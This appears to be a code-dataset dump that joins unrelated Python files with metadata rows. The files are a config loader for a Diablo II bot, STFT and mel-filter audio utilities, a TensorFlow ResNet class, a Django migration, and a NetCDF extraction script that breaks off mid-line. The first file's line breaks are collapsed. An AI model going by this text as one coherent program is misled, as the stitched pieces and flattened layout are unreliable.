import configparser import numpy as np import os class Config: def _select_val(self, section: str, key: str = None): if section in self._custom and key in self._custom[section]: return self._custom[section][key] elif section in self._config: return self._config[section][key] elif section in self._pickit_config: return self._pickit_config[section][key] elif section in self._shop_config: return self._shop_config[section][key] else: return self._game_config[section][key] def __init__(self, print_warnings: bool = False): # print_warnings, what a hack... here it is, not making the effort # passing a single config instance through bites me in the ass self._print_warnings = print_warnings self._config = configparser.ConfigParser() self._config.read('config/params.ini') self._game_config = configparser.ConfigParser() self._game_config.read('config/game.ini') self._pickit_config = configparser.ConfigParser() self._pickit_config.read('config/pickit.ini') self._shop_config = configparser.ConfigParser() self._shop_config.read('config/shop.ini') self._custom = configparser.ConfigParser() if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'): self._custom.read('config/custom.ini') self.general = { "saved_games_folder": self._select_val("general", "saved_games_folder"), "name": self._select_val("general", "name"), "monitor": int(self._select_val("general", "monitor")), "max_game_length_s": float(self._select_val("general", "max_game_length_s")), "exit_key": self._select_val("general", "exit_key"), "resume_key": self._select_val("general", "resume_key"), "auto_settings_key": self._select_val("general", "auto_settings_key"), "graphic_debugger_key": self._select_val("general", "graphic_debugger_key"), "logg_lvl": self._select_val("general", "logg_lvl"), "randomize_runs": bool(int(self._select_val("general", "randomize_runs"))), "difficulty": self._select_val("general", "difficulty"), "custom_message_hook": self._select_val("general", "custom_message_hook"), "discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")), "info_screenshots": bool(int(self._select_val("general", "info_screenshots"))), "loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))), } # Added for dclone ip hunting self.dclone = { "region_ips": self._select_val("dclone", "region_ips"), "dclone_hotip": self._select_val("dclone", "dclone_hotip"), } self.routes = {} for key in self._config["routes"]: self.routes[key] = bool(int(self._select_val("routes", key))) self.char = { "type": self._select_val("char", "type"), "show_items": self._select_val("char", "show_items"), "inventory_screen": self._select_val("char", "inventory_screen"), "stand_still": self._select_val("char", "stand_still"), "force_move": self._select_val("char", "force_move"), "num_loot_columns": int(self._select_val("char", "num_loot_columns")), "take_health_potion": float(self._select_val("char", "take_health_potion")), "take_mana_potion": float(self._select_val("char", "take_mana_potion")), "take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")), "take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")), "heal_merc": float(self._select_val("char", "heal_merc")), "heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")), "chicken": float(self._select_val("char", "chicken")), "merc_chicken": float(self._select_val("char", "merc_chicken")), "tp": self._select_val("char", "tp"), "belt_rows": int(self._select_val("char", "belt_rows")), "show_belt": self._select_val("char", "show_belt"), "potion1": self._select_val("char", "potion1"), "potion2": self._select_val("char", "potion2"), "potion3": self._select_val("char", "potion3"), "potion4": self._select_val("char", "potion4"), "belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")), "belt_hp_columns": int(self._select_val("char", "belt_hp_columns")), "belt_mp_columns": int(self._select_val("char", "belt_mp_columns")), "stash_gold": bool(int(self._select_val("char", "stash_gold"))), "gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))), "use_merc": bool(int(self._select_val("char", "use_merc"))), "pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))), "cta_available": bool(int(self._select_val("char", "cta_available"))), "weapon_switch": self._select_val("char", "weapon_switch"), "battle_orders": self._select_val("char", "battle_orders"), "battle_command": self._select_val("char", "battle_command"), "casting_frames": int(self._select_val("char", "casting_frames")), "atk_len_trav": float(self._select_val("char", "atk_len_trav")), "atk_len_pindle": float(self._select_val("char", "atk_len_pindle")), "atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")), "atk_len_shenk": float(self._select_val("char", "atk_len_shenk")), "atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")), "hork_time_pindle": float(self._select_val("char", "hork_time_pindle")), "hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")), "hork_time_shenk": float(self._select_val("char", "hork_time_shenk")), "hork_time_council": float(self._select_val("char", "hork_time_council")), "hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")), } self.sorceress = dict(self._config["sorceress"]) if "sorceress" in self._custom: self.sorceress.update(dict(self._custom["sorceress"])) self.hammerdin = self._config["hammerdin"] if "hammerdin" in self._custom: self.hammerdin.update(self._custom["hammerdin"]) self.trapsin = self._config["trapsin"] if "trapsin" in self._custom: self.trapsin.update(self._custom["trapsin"]) self.barbarian = self._config["barbarian"] if "barbarian" in self._custom: self.barbarian.update(self._custom["barbarian"]) self.advanced_options = { "pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10), "message_headers": self._select_val("advanced_options", "message_headers"), "message_body_template": self._select_val("advanced_options", "message_body_template"), "message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))), } self.items = {} for key in self._pickit_config["items"]: self.items[key] = int(self._select_val("items", key)) if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings: print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items") self.colors = {} for key in self._game_config["colors"]: self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2) self.ui_pos = {} for key in self._game_config["ui_pos"]: self.ui_pos[key] = int(self._select_val("ui_pos", key)) self.ui_roi = {} for key in self._game_config["ui_roi"]: self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")]) self.path = {} for key in self._game_config["path"]: self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2)) self.shop = { "shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))), "shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))), "shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))), "shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))), "trap_min_score": int(self._select_val("claws", "trap_min_score")), "melee_min_score": int(self._select_val("claws", "melee_min_score")), } if __name__ == "__main__": config = Config(print_warnings=True) # Check if any added items miss templates for k in config.items: if not os.path.exists(f"./assets/items/{k}.png"): print(f"Template not found: {k}") # Check if any item templates miss a config for filename in os.listdir(f'assets/items'): filename = filename.lower() if filename.endswith('.png'): item_name = filename[:-4] blacklist_item = item_name.startswith("bl__") if item_name not in config.items and not blacklist_item: print(f"Config not found for: " + filename)
55.45
164
0.616772
9,260
0.927763
0
0
0
0
0
0
3,590
0.359683
4c50b18cade6c81fd3dffac9c31804d4407603cf
19,446
py
Python
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
2
2021-06-17T20:29:02.000Z
2021-09-18T01:56:36.000Z
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
null
null
null
aps/transform/utils.py
haoxiangsnr/aps
38f77139b54553b0cb04b26a833bebbbf3177c5e
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 Jian Wu # License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) import math import numpy as np import torch as th import torch.nn as nn import torch.nn.functional as tf import librosa.filters as filters from aps.const import EPSILON from typing import Optional, Union, Tuple def init_window(wnd: str, frame_len: int) -> th.Tensor: """ Return window coefficient Args: wnd: window name frame_len: length of the frame """ def sqrthann(frame_len, periodic=True): return th.hann_window(frame_len, periodic=periodic)**0.5 if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]: raise RuntimeError(f"Unknown window type: {wnd}") wnd_tpl = { "sqrthann": sqrthann, "hann": th.hann_window, "hamm": th.hamming_window, "blackman": th.blackman_window, "bartlett": th.bartlett_window, "rect": th.ones } if wnd != "rect": # match with librosa c = wnd_tpl[wnd](frame_len, periodic=True) else: c = wnd_tpl[wnd](frame_len) return c def init_kernel(frame_len: int, frame_hop: int, window: str, round_pow_of_two: bool = True, normalized: bool = False, inverse: bool = False, mode: str = "librosa") -> th.Tensor: """ Return STFT kernels Args: frame_len: length of the frame frame_hop: hop size between frames window: window name round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: return normalized DFT matrix inverse: return iDFT matrix mode: framing mode (librosa or kaldi) """ if mode not in ["librosa", "kaldi"]: raise ValueError(f"Unsupported mode: {mode}") # FFT points B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len # center padding window if needed if mode == "librosa" and B != frame_len: lpad = (B - frame_len) // 2 window = tf.pad(window, (lpad, B - frame_len - lpad)) if normalized: # make K^H * K = I S = B**0.5 else: S = 1 I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1) # W x B x 2 K = th.fft(I / S, 1) if mode == "kaldi": K = K[:frame_len] if inverse and not normalized: # to make K^H * K = I K = K / B # 2 x B x W K = th.transpose(K, 0, 2) * window # 2B x 1 x W K = th.reshape(K, (B * 2, 1, K.shape[-1])) return K, window def mel_filter(frame_len: int, round_pow_of_two: bool = True, num_bins: Optional[int] = None, sr: int = 16000, num_mels: int = 80, fmin: float = 0.0, fmax: Optional[float] = None, norm: bool = False) -> th.Tensor: """ Return mel filter coefficients Args: frame_len: length of the frame round_pow_of_two: if true, choose round(#power_of_two) as the FFT size num_bins: number of the frequency bins produced by STFT num_mels: number of the mel bands fmin: lowest frequency (in Hz) fmax: highest frequency (in Hz) norm: normalize the mel filter coefficients """ # FFT points if num_bins is None: N = 2**math.ceil( math.log2(frame_len)) if round_pow_of_two else frame_len else: N = (num_bins - 1) * 2 # fmin & fmax freq_upper = sr // 2 if fmax is None: fmax = freq_upper else: fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper) fmin = max(0, fmin) # mel filter coefficients mel = filters.mel(sr, N, n_mels=num_mels, fmax=fmax, fmin=fmin, htk=True, norm="slaney" if norm else None) # num_mels x (N // 2 + 1) return th.tensor(mel, dtype=th.float32) def speed_perturb_filter(src_sr: int, dst_sr: int, cutoff_ratio: float = 0.95, num_zeros: int = 64) -> th.Tensor: """ Return speed perturb filters, reference: https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py Args: src_sr: sample rate of the source signal dst_sr: sample rate of the target signal Return: weight (Tensor): coefficients of the filter """ if src_sr == dst_sr: raise ValueError( f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}") gcd = math.gcd(src_sr, dst_sr) src_sr = src_sr // gcd dst_sr = dst_sr // gcd if src_sr == 1 or dst_sr == 1: raise ValueError("do not support integer downsample/upsample") zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio padding = 1 + int(num_zeros / zeros_per_block) # dst_sr x src_sr x K times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) - np.arange(src_sr)[None, :, None] / float(src_sr) - np.arange(2 * padding + 1)[None, None, :] + padding) window = np.heaviside(1 - np.abs(times / padding), 0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi)) weight = np.sinc( times * zeros_per_block) * window * zeros_per_block / float(src_sr) return th.tensor(weight, dtype=th.float32) def splice_feature(feats: th.Tensor, lctx: int = 1, rctx: int = 1, subsampling_factor: int = 1, op: str = "cat") -> th.Tensor: """ Splice feature Args: feats (Tensor): N x ... x T x F, original feature lctx: left context rctx: right context subsampling_factor: subsampling factor op: operator on feature context Return: splice (Tensor): feature with context padded """ if lctx + rctx == 0: return feats if op not in ["cat", "stack"]: raise ValueError(f"Unknown op for feature splicing: {op}") # [N x ... x T x F, ...] ctx = [] T = feats.shape[-2] T = T - T % subsampling_factor for c in range(-lctx, rctx + 1): idx = th.arange(c, c + T, device=feats.device, dtype=th.int64) idx = th.clamp(idx, min=0, max=T - 1) ctx.append(th.index_select(feats, -2, idx)) if op == "cat": # N x ... x T x FD splice = th.cat(ctx, -1) else: # N x ... x T x F x D splice = th.stack(ctx, -1) return splice def _forward_stft( wav: th.Tensor, kernel: th.Tensor, output: str = "polar", pre_emphasis: float = 0, frame_hop: int = 256, onesided: bool = False, center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT inner function Args: wav (Tensor), N x (C) x S kernel (Tensor), STFT transform kernels, from init_kernel(...) output (str), output format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples pre_emphasis: factor of preemphasis onesided: return half FFT bins center: if true, we assumed to have centered frames Return: transform (Tensor or [Tensor, Tensor]), STFT transform results """ wav_dim = wav.dim() if output not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {output}") if wav_dim not in [2, 3]: raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D") # if N x S, reshape N x 1 x S # else: reshape NC x 1 x S N, S = wav.shape[0], wav.shape[-1] wav = wav.view(-1, 1, S) # NC x 1 x S+2P if center: pad = kernel.shape[-1] // 2 # NOTE: match with librosa wav = tf.pad(wav, (pad, pad), mode="reflect") # STFT if pre_emphasis > 0: # NC x W x T frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]), stride=frame_hop, padding=0) frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1] # 1 x 2B x W, NC x W x T, NC x 2B x T packed = th.matmul(kernel[:, 0][None, ...], frames) else: packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0) # NC x 2B x T => N x C x 2B x T if wav_dim == 3: packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1]) # N x (C) x B x T real, imag = th.chunk(packed, 2, dim=-2) # N x (C) x B/2+1 x T if onesided: num_bins = kernel.shape[0] // 4 + 1 real = real[..., :num_bins, :] imag = imag[..., :num_bins, :] if output == "complex": return (real, imag) elif output == "real": return th.stack([real, imag], dim=-1) else: mag = (real**2 + imag**2 + EPSILON)**0.5 pha = th.atan2(imag, real) return (mag, pha) def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], kernel: th.Tensor, window: th.Tensor, input: str = "polar", frame_hop: int = 256, onesided: bool = False, center: bool = False) -> th.Tensor: """ iSTFT inner function Args: transform (Tensor or [Tensor, Tensor]), STFT transform results kernel (Tensor), STFT transform kernels, from init_kernel(...) input (str), input format: polar: return (magnitude, phase) pair complex: return (real, imag) pair real: return [real; imag] Tensor frame_hop: frame hop size in number samples onesided: return half FFT bins center: used in _forward_stft Return: wav (Tensor), N x S """ if input not in ["polar", "complex", "real"]: raise ValueError(f"Unknown output format: {input}") if input == "real": real, imag = transform[..., 0], transform[..., 1] elif input == "polar": real = transform[0] * th.cos(transform[1]) imag = transform[0] * th.sin(transform[1]) else: real, imag = transform # (N) x F x T imag_dim = imag.dim() if imag_dim not in [2, 3]: raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D") # if F x T, reshape 1 x F x T if imag_dim == 2: real = th.unsqueeze(real, 0) imag = th.unsqueeze(imag, 0) if onesided: # [self.num_bins - 2, ..., 1] reverse = range(kernel.shape[0] // 4 - 1, 0, -1) # extend matrix: N x B x T real = th.cat([real, real[:, reverse]], 1) imag = th.cat([imag, -imag[:, reverse]], 1) # pack: N x 2B x T packed = th.cat([real, imag], dim=1) # N x 1 x T s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0) # normalized audio samples # refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171 # 1 x W x T win = th.repeat_interleave(window[None, ..., None], packed.shape[-1], dim=-1) # W x 1 x W I = th.eye(window.shape[0], device=win.device)[:, None] # 1 x 1 x T norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0) if center: pad = kernel.shape[-1] // 2 s = s[..., pad:-pad] norm = norm[..., pad:-pad] s = s / (norm + EPSILON) # N x S s = s.squeeze(1) return s def forward_stft( wav: th.Tensor, frame_len: int, frame_hop: int, output: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, pre_emphasis: float = 0, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT function implementation, equals to STFT layer Args: wav: source audio signal frame_len: length of the frame frame_hop: hop size between frames output: output type (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size pre_emphasis: factor of preemphasis normalized: use normalized DFT kernel onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) mode: "kaldi"|"librosa", slight difference on applying window function """ K, _ = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=False, mode=mode) return _forward_stft(wav, K.to(wav.device), output=output, frame_hop=frame_hop, pre_emphasis=pre_emphasis, onesided=onesided, center=center) def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], frame_len: int, frame_hop: int, input: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> th.Tensor: """ iSTFT function implementation, equals to iSTFT layer Args: transform: results of STFT frame_len: length of the frame frame_hop: hop size between frames input: input format (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel onesided: output onesided STFT mode: "kaldi"|"librosa", slight difference on applying window function """ if isinstance(transform, th.Tensor): device = transform.device else: device = transform[0].device K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=True, mode=mode) return _inverse_stft(transform, K.to(device), w.to(device), input=input, frame_hop=frame_hop, onesided=onesided, center=center) class STFTBase(nn.Module): """ Base layer for (i)STFT Args: frame_len: length of the frame frame_hop: hop size between frames window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel pre_emphasis: factor of preemphasis mode: "kaldi"|"librosa", slight difference on applying window function onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) """ def __init__(self, frame_len: int, frame_hop: int, window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, pre_emphasis: float = 0, onesided: bool = True, inverse: bool = False, center: bool = False, mode="librosa") -> None: super(STFTBase, self).__init__() K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=inverse, mode=mode) self.K = nn.Parameter(K, requires_grad=False) self.w = nn.Parameter(w, requires_grad=False) self.frame_len = frame_len self.frame_hop = frame_hop self.onesided = onesided self.pre_emphasis = pre_emphasis self.center = center self.mode = mode self.num_bins = self.K.shape[0] // 4 + 1 self.expr = ( f"window={window}, stride={frame_hop}, onesided={onesided}, " + f"pre_emphasis={self.pre_emphasis}, normalized={normalized}, " + f"center={self.center}, mode={self.mode}, " + f"kernel_size={self.num_bins}x{self.K.shape[2]}") def num_frames(self, wav_len: th.Tensor) -> th.Tensor: """ Compute number of the frames """ if th.sum(wav_len <= self.frame_len): raise RuntimeError( f"Audio samples less than frame_len ({self.frame_len})") kernel_size = self.K.shape[-1] if self.center: wav_len += kernel_size return (wav_len - kernel_size) // self.frame_hop + 1 def extra_repr(self) -> str: return self.expr class STFT(STFTBase): """ Short-time Fourier Transform as a Layer """ def __init__(self, *args, **kwargs): super(STFT, self).__init__(*args, inverse=False, **kwargs) def forward( self, wav: th.Tensor, output: str = "polar" ) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ Accept (single or multiple channel) raw waveform and output magnitude and phase Args wav (Tensor) input signal, N x (C) x S Return transform (Tensor or [Tensor, Tensor]), N x (C) x F x T """ return _forward_stft(wav, self.K, output=output, frame_hop=self.frame_hop, pre_emphasis=self.pre_emphasis, onesided=self.onesided, center=self.center) class iSTFT(STFTBase): """ Inverse Short-time Fourier Transform as a Layer """ def __init__(self, *args, **kwargs): super(iSTFT, self).__init__(*args, inverse=True, **kwargs) def forward(self, transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], input: str = "polar") -> th.Tensor: """ Accept phase & magnitude and output raw waveform Args transform (Tensor or [Tensor, Tensor]), STFT output Return s (Tensor), N x S """ return _inverse_stft(transform, self.K, self.w, input=input, frame_hop=self.frame_hop, onesided=self.onesided, center=self.center)
34.849462
121
0.538671
4,325
0.222411
0
0
0
0
0
0
6,964
0.35812
4c517119112a50b7dbf0616dc32615e3180ecafa
3,427
py
Python
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
applications/tensorflow/cnns/models/resnet.py
xihuaiwen/chinese_bert
631afbc76c40b0ac033be2186e717885246f446c
[ "MIT" ]
null
null
null
# Copyright 2019 Graphcore Ltd. from models.resnet_base import ResNet import tensorflow.compat.v1 as tf import tensorflow.contrib as contrib from tensorflow.python.ipu import normalization_ops # This is all written for: NHWC class TensorflowResNet(ResNet): def __init__(self, *args, **kwargs): self.dtype = tf.float16 super(TensorflowResNet, self).__init__(*args, **kwargs) def _get_variable(self, name, shape, init): return tf.get_variable(name, shape, initializer=init, dtype=self.dtype) def residual(self, x, shortcut, out_filters, stride, type='B'): in_shape = shortcut.get_shape() pad = int(x.get_shape()[3] - in_shape[3]) if pad != 0 or type == 'C': if type == 'A': shortcut = tf.strided_slice(shortcut, [0, 0, 0, 0], in_shape, strides=[1, stride, stride, 1]) shortcut = tf.pad(shortcut, paddings=[[0, 0], [0, 0], [0, 0], [0, pad]]) else: shortcut = self.conv(shortcut, 1, stride, out_filters) shortcut = self.norm(shortcut) x = shortcut + x x = self.relu(x) return x def relu(self, x): return tf.nn.relu(x) def conv(self, x, ksize, stride, filters_out, bias=True): filters_in = x.get_shape()[-1] wshape = [ksize, ksize, filters_in, filters_out] w_init = contrib.layers.xavier_initializer(dtype=self.dtype) weights = self._get_variable('weights', shape=wshape, init=w_init) x = tf.nn.conv2d(x, weights, [1, stride, stride, 1], padding='SAME') if bias: bshape = [filters_out] b_init = tf.zeros_initializer() biases = self._get_variable('biases', shape=bshape, init=b_init) x = x + biases return x def norm(self, x, type='BATCH', groups=32, training=False): if type == 'BATCH': # Perhaps use tf.nn.fused_batch_norm instead. x = tf.layers.batch_normalization(x, fused=True, center=True, scale=True, training=training, trainable=training, momentum=0.997, epsilon=1e-5) elif type == 'GROUP': x = normalization_ops.group_norm(x, groups=groups, center=True, scale=True, training=training, trainable=training, channels_axis=-1, reduction_axes=[-3, -2]) return x def fc(self, x, num_units_out): num_units_in = x.get_shape()[1] w_init = contrib.layers.xavier_initializer(dtype=self.dtype) b_init = tf.constant_initializer(0.0) with self.namescope('fc'): weights = self._get_variable('weights', shape=[num_units_in, num_units_out], init=w_init) biases = self._get_variable('biases', shape=[num_units_out], init=b_init) x = tf.nn.xw_plus_b(x, weights, biases) return x def reduce_mean(self, x, indices=(1, 2)): x = tf.reduce_mean(x, reduction_indices=indices) return x def maxpool(self, x): x = tf.nn.max_pool( x, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME') return x def namescope(self, debug_string): return tf.variable_scope(debug_string)
38.505618
101
0.569594
3,197
0.932886
0
0
0
0
0
0
187
0.054567
4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8
613
py
Python
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
backend/app/migrations/0021_auto_20201205_1846.py
mareknowak98/AuctionPortal
0059fec07d51c6942b8af73cb8c4f9962c21fc97
[ "MIT" ]
null
null
null
# Generated by Django 3.1.4 on 2020-12-05 18:46 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0020_auto_20201204_2324'), ] operations = [ migrations.AlterField( model_name='profile', name='profileBankAccountNr', field=models.CharField(blank=True, max_length=30, null=True), ), migrations.AlterField( model_name='profile', name='profileTelephoneNumber', field=models.CharField(blank=True, max_length=15, null=True), ), ]
25.541667
73
0.60522
520
0.848287
0
0
0
0
0
0
141
0.230016
4c551d5c25c26d348d1738fdb22529ee094e17ed
8,942
py
Python
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
rawcdf_extract.py
bedaro/ssm-analysis
09880dbfa5733d6301b84accc8f42a5ee320d698
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import time import os import tempfile import shutil import logging from enum import Enum from argparse import ArgumentParser, Namespace, FileType from netCDF4 import Dataset, MFDataset import geopandas as gpd import numpy as np domain_nodes_shp = "gis/ssm domain nodes.shp" masked_nodes_txt = "gis/masked nodes.txt" logger = logging.getLogger(__name__) def get_node_ids(shps, masked): merged = None for i,shp in enumerate(shps): df = gpd.read_file(shp) df.set_index('node_id', inplace=True) logger.debug("Shapefile {0} has {1} nodes".format(shp, len(df))) if merged is None: merged = df.index else: merged = merged.union(df.index) logger.debug("get_node_ids found {0} nodes in {1} shapefiles".format( len(merged), len(shps))) masked_nodes = np.loadtxt(masked) merged = merged.difference(masked_nodes) logger.debug("{0} nodes left after masking".format(len(merged))) return merged.to_numpy() DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949, -0.30326778, -0.40915567, -0.52520996, -0.65060186, -0.78467834, -0.9269075 ] def init_output(output_cdf, indata, nodes, **kwargs): args = Namespace(**kwargs) output = Dataset(output_cdf, "w") timeDim = output.createDimension('time', len(indata.dimensions['time'])) nodeDim = output.createDimension('node', len(nodes)) nodeVar = output.createVariable('node', "i4", ('node',)) output['node'][:] = nodes timeVar = output.createVariable('time', "f4", ('time',)) # Iterate over all output variables # If an extraction attribute is "all": # - add the 'siglay' dimension to the output if it's not already present # - include the 'siglay' dimension on the output variable # - add a 'zeta' output variable for var, attr in args.input_vars: if attr == InputAttr.ALL: siglayers = indata['siglay'][:] if 'siglay' in indata.variables else DEFAULT_SIGLAYERS output.createDimension('siglay', len(siglayers)) output.createVariable('siglay', 'f4', ('siglay',)) output['siglay'][:] = siglayers if 'zeta' in indata.variables: output.createVariable('zeta', 'f4', ('time','node')) break return output def append_output(output_cdf): return Dataset(output_cdf, 'a') def init_output_vars(output, **kwargs): args = Namespace(**kwargs) for var, attr in args.input_vars: out_name = args.outprefix + var if attr == InputAttr.BOTTOM: out_name += "_bottom" # TODO handle photic case dims = ('time','siglay','node') if attr == InputAttr.ALL else ('time','node') output.createVariable(out_name, 'f4', dims) # Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i+n] class InputAttr(Enum): ALL = 0 BOTTOM = 1 # TODO add "photic" for the photic zone attr_strings = { "all": InputAttr.ALL, "bottom": InputAttr.BOTTOM } # Expands an input variable argument into a variable name and an attribute # describing the vertical extraction method. def colon_meta(string): var, attr = string.split(':', 2) return (var, attr_strings[attr]) def main(): script_home = os.path.dirname(os.path.realpath(__file__)) parser = ArgumentParser(description="Extract data from SSM netcdf output files") parser.add_argument("incdf", nargs="+", help="each input CDF file") parser.add_argument("outcdf", help="the output CDF file (created if it doesn't exist)") parser.add_argument("outprefix", help="a prefix for the extracted variables in the output CDF") parser.add_argument("-d", dest="domain_node_shapefiles", action="append", help="Specify a domain node shapefile") parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'), help="Specify a different masked nodes text file") parser.add_argument("--invar", dest="input_vars", type=colon_meta, action="append", help="Extract the values of a different output variable") parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", help="Print progress messages during the extraction") parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size", help="Process this many CDF files at once") parser.add_argument("--cache", dest="cache", action="store_true", help="Use a read/write cache in a temporary directory") # Cannot include default values of lists here, see # https://bugs.python.org/issue16399 parser.set_defaults(chunk_size=4, verbose=False, masked_nodes_file=os.path.join(script_home, masked_nodes_txt)) args = parser.parse_args() # This is the workaround if not args.input_vars: args.input_vars = [("DOXG",InputAttr.BOTTOM)] if not args.domain_node_shapefiles: args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)] logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING) #logger.setLevel(logging.DEBUG) if args.cache: with tempfile.TemporaryDirectory() as tmpdir: exist_cdfs = [] logger.info("Caching input files...") for infile in args.incdf: newpath = os.path.join(tmpdir, os.path.basename(infile)) shutil.copy(infile, newpath) exist_cdfs.append(newpath) output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf)) if os.path.exists(args.outcdf): logger.info("Caching output file...") shutil.copy(args.outcdf, output_cdf) do_extract(exist_cdfs, output_cdf, **vars(args)) # Copy the resulting output CDF back logger.info("Saving output file...") shutil.copy(output_cdf, args.outcdf) logger.info("Finished.") else: do_extract(args.incdf, args.outcdf, **vars(args)) def do_extract(exist_cdfs, output_cdf, **kwargs): args = Namespace(**kwargs) logger.info("Determining scope of work...") indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0]) node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file) logger.info("Initializing output file...") if not os.path.exists(output_cdf): outdata = init_output(output_cdf, indata, node_ids, **vars(args)) outdata['time'][:] = 